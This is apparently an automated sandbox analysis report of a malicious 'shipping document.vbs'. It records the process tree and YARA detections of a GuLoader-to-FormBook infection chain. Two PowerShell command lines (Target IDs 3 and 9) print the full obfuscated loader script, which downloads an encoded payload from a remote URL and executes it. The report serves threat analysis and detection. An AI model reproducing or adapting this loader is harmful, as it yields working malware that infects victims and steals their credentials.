x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                            Accept-Ranges: bytes
                                                            Content-Length: 270400
                                                            Last-Modified: Sun, 21 Apr 2024 19:19:22 GMT
                                                            Date: Tue, 23 Apr 2024 05:54:09 GMT
                                                            Expires: Tue, 23 Apr 2024 05:54:09 GMT
                                                            Cache-Control: private, max-age=0
                                                            X-Goog-Hash: crc32c=zew8hg==
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close



                                                            Target ID:0
                                                            Start time:07:53:22
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
                                                            Imagebase:0x7ff73d400000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:07:53:24
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff72d8c0000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:3
                                                            Start time:07:53:35
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. 
UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249 (Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia 'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol SynseOverfbKnudsrSm kit 
.nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro ') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249 (Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$ Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$ Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea ');Standglas249 $Diakonaterne;"
                                                            Imagebase:0x7ff760310000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2059655451.000001FCED5D2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:07:53:35
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff70f010000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:07:53:37
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
                                                            Imagebase:0x7ff6936b0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:07:53:45
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. 
UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st promeFlambrS.orvsI for.PrkenHColoneSpindagal.idunsupeChackrTod,msMelon[ M.sh$VrsarB Trafo sskrgSuperhefteroCeremlSigtvd Kr.bePerierho ogsJelvakIntereXyl nrTtnin] Afgi=Serve$FlertU AppesRundshUndtaeSpreweLdstenUd yt ');$Festtale=Quillaia 'HandeRSemi,eOverfpBloteaepidii Ol.jn Du.ptFizzieUphoar Ray,sVaric.MilkeDEmotio estiwUdlign IndelTeosoosilicaMtaa dAbrasFDrosliSoccilCleaneSkatt(Azafr$SlgelFKitteiOpstinMikset Dags,Crush$ BefrSvoldek draciTriphb.chizsBe,ldjUnexpostudeuUnmudr SympnPr,ddaFlytnlSlippesqua r L,vsndiasteKunstsSsy,e) dr t ';$Festtale=$Resignerendes[1]+$Festtale;$Skibsjournalernes=$Resignerendes[0];Standglas249 (Quillaia 'Brakm$LighegSurfalCongoo Fy,sbPrecoaGudbjlBar o: SupeRCleareSofa.m u maaUdkomr SchokAntila AfsobUn.rrlPeri,y Solp=Win e(TaksaT ogleeornamsM nistK,mme-,ankePIdioea Crowt RehahMedie Ballv$ Odr SInstikDetroiDorosbAperisKan.ijFruesoN,rreuV ndmrKaraknOculaa Ly,nl .asseStiftr UndenOverseBartesNu,me) St a ');while (!$Remarkably) {Standglas249 (Quillaia 'Thoma$Co trg AnorlSygelo onarbSlangaGo rmlForbr:UfuldPbrumpapapmarUnpuntExactoMflov=Forld$HitchtCorrirkussouSelvseMo.ul ') ;Standglas249 $Festtale;Standglas249 (Quillaia 'BefstSun,ontSir paconderNilavt pons-ExtraS Dus,lIs lue.udlaeLakmupulemp Yd,rs4An,sc ');Standglas249 (Quillaia 'Entir$Manipg ForglAffiloSporubManufaUkamplSprng:Bons.RMagiseMudcamprinca N porBlikkkBl,asaHed,ebv.redlStaffyNon.o=shaiv(JospiTunglaeUkends urantAfg.a- Afh.PSjaslaUpdritPers hBe rb Amor$JagttSRappokDetaciAerobbL,annsGadedjstranoToxicuFor,trStoern UndeahyldelD.wnseFormerPassenSia eeFigensUn.ea)D.min ') ;Standglas249 (Quillaia ' Summ$CrookgReprolBadehoHypoxb RickaSkotjlGener:MarkrR Heiso Av.ac Egnsk Domss SamlaOikoln mortg EklieMonoprSigurn Mer.eBe,resS.agh7H rmo1Broch=Ruske$Bredyg ,ictl Mordo SubgbLauserBandwl.ilig: LejrrLuk.euUnderlmellol SynseOverfbKnudsrSm kit 
.nfo+Hu,dr+S,and%Bereg$Udde P Akt,r dundfKarataVeloubL.thir TyleiDdsmakGiol e,ilburModer.BintjcAvisuoMikrouCertinWoometMicro ') ;$Fint=$Prfabriker[$Rocksangernes71];}Standglas249 (Quillaia 'Ko,ls$Testag Frecl Forbori.orbEditoaOpklol Salv: Vi,uTFodenr FifolStvlebSalmoi SpacnForesdDokumeC.rku Noble=Gejs VanilGSaltveLrerrtPhena-,nomaCbennso rognBitt.t Nonce Evo nEftertFrste Stapl$libatSDialyk BestiRamsobAlgopsBaa.ejReg oo cycluClimar.idernKursaa irselBas,ie Gloorc,athnJuli eHem csbistt ');Standglas249 (Quillaia 'Unfee$Arbejg,opillT,lbao ikkeb Dis.aEx,rclTrigg: B triP,lvenradisdingleeBeskac Sta.iPolycpSproghD releSemidrGendaa,ottibHagi.lL,ghteCholi Papal=Katar Seren[.tomkSBivaayInters,dkldtTrakkeUnbeam viva.Z.oloCD.posoSc.nin,ourmv CoreePanserPistatE der]O,ste:Forna:Ma.teFwo,mer TestoBankkmJernsBTrs raPrgnas Fnbleparri6 Ta k4Tom eSEntaltSpicurR pariSyrernPdagogHuman(Prveb$HovedTRigsorUse slS,nsobSioldiMistvnWolfrdHor eeAntil) Be e ');Standglas249 (Quillaia 'Konom$Di,gdg NordlBroomoHyphebIn eraUnseplKofan:ExcreAUngulc,vaerr Fodse AllenArsen Ultra=,psee Ope,a[CadgiS Af,eyPetausmyeletDro,kePibrom Reli.UnderTDogmeeHemizx Engrt Fox,..illiE Chafn FlascDonkeoOmb kd RegniLegitn CephgDoesk]Stk.s: .ors: B,reA Fj.lSVulgaC,riadIA.troI Spir.HernaGYiddieFar otBedemS,roantNoncer Bi.niEjersnT.rrigPol,p(Bra,k$ Redii,atihnGr,nddSvirreRhizocKanali AnnopRunddhSubareti.anrMesocaT,lsibRaketlHjerte Kort)I.ter ');Standglas249 (Quillaia 'B,lde$ Mangg ReaclWhippoSolidbIndisaPrinclBelej:NatioDArkaii ordearevy kMyo,eoSw,atnM.yasaBes,gtHalvfeFunktrOv rhnUdefre hurb=Flitt$OpsprAUdnytc,yrdsrKnivseValsen Slum. rei,sFabriuContabTaroksPeriptm llerdbefoiDatamndk,lag pla (Paa a2Lirke9Preco5Poste6 U.fr3facon8Fabri,Bem.n2 Anst9boart2Aflej1Enfon9I.can)Aotea ');Standglas249 $Diakonaterne;"
                                                            Imagebase:0xa20000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.1940563125.00000000084A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.1930663126.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.1940984455.000000000965B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:07:53:46
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
                                                            Imagebase:0xc50000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:07:54:01
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:07:54:02
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:07:54:33
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe"
                                                            Imagebase:0xd10000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:17
                                                            Start time:07:54:35
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\SysWOW64\openfiles.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\openfiles.exe"
                                                            Imagebase:0xa40000
                                                            File size:60'416 bytes
                                                            MD5 hash:50BD10A4C573E609A401114488299D3D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:18
                                                            Start time:07:54:48
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe"
                                                            Imagebase:0xd10000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:19
                                                            Start time:07:54:53
                                                            Start date:23/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0x30000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:07:54:55
                                                            Start date:23/04/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            Imagebase:0x7ff60e320000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
